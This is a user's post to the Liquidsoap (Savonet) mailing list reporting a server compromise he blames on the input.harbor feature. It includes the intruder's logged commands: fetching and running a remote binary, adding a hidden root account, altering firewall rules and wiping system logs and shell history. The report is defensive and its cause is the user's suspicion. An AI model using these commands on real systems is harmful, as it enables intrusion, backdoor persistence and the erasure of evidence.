[Savonet-users] ###### huge security bug #####

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 454-5900

Guys,
I'm using the liquidsoap for some time, I have enabled the "input.harbor"
in my script, it is a dynamic script that always generates User and
password dynamically.
I saw that when enabled "input.harbor" I my machine is invaded and runs on
my machine the following commands bellow, I formatted 3 times the machine
and I did several tests and yes, the security hole that allows access to my
machine is when the "input.harbor" is enabled.
Basically what I noticed is that the invader installs a SYS flood in my
machine, nothing more than that, but this is very serious.

Please who have "input.harbor" enabled can verify that? Check the user
"webll" in your /etc/passwd

ip where does the connection comes from *104.239.228.251*

*Commands run on my machine at all access *
ps -ef
    2  cd /bin
    3  wget http://58.64.207.219:888/sshh
    4  chmod 0755 sshh
    5  ./sshh
    6  useradd -o -u 0 -g 0 -M -d /root -s /bin/bash webll
    7  passwd webll
    8  iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
    9  iptables -D INPUT -p tcp --dport 6379 -j DROP
   10  echo>ar/log/syslog
   11  echo>ar/log/messages
   12  echo>ar/logtpd/access_log
   13  echo>ar/logtpd/error_log0
   14  echo>ar/log/xferlog
   15  echo>ar/logcure
   16  echo>ar/log/auth.log
   17  echo>ar/log/user.log
   18  echo>ar/log/wtmp
   19  echo>ar/log/lastlog
   20  echo>ar/log/btmp
   21  echo>ar/run/utmp
   22  echo >/root/.bash_history
   23  history-c

live = input.harbor(
            id = "#{mount_name}",
            on_connect = live_start,
            on_disconnect = live_stop,
            buffer=8.,
            max=20.,
            icy = true,
            port = int_of_string(port2), *Dynamic port *
            user = "#{mount_name}", *Dynamic mount point*
            password = "#{streamingPasswordHarbor}", *Dynamic Password*
            "#{mount_name}")

root@liquidsoap:/home/ubuntu/live# *uname -a*

*Linux liquidsoap 3.13.0-74-generic #118-Ubuntu SMP Thu Dec 17 22:52:10 UTC
2015 x86_64 x86_64 x86_64 GNU/Linux*

root@liquidsoap:/home/ubuntu/live# *liquidsoap --version*

*Liquidsoap 1.2.0+scm
(git://github.com/savonet/liquidsoap.git@5828d260cbaafb13952f0b65b7abd9867ea72308:20160202:091347
<http://github.com/savonet/liquidsoap.git@5828d260cbaafb13952f0b65b7abd9867ea72308:20160202:091347>)*

Copyright (c) 2003-2016 Savonet team

Liquidsoap is open-source software, released under GNU General Public
License.

See <http://liquidsoap.fm> for more information.

-- 
Mauro Delazeri
+1 646 275 7568
New York - NY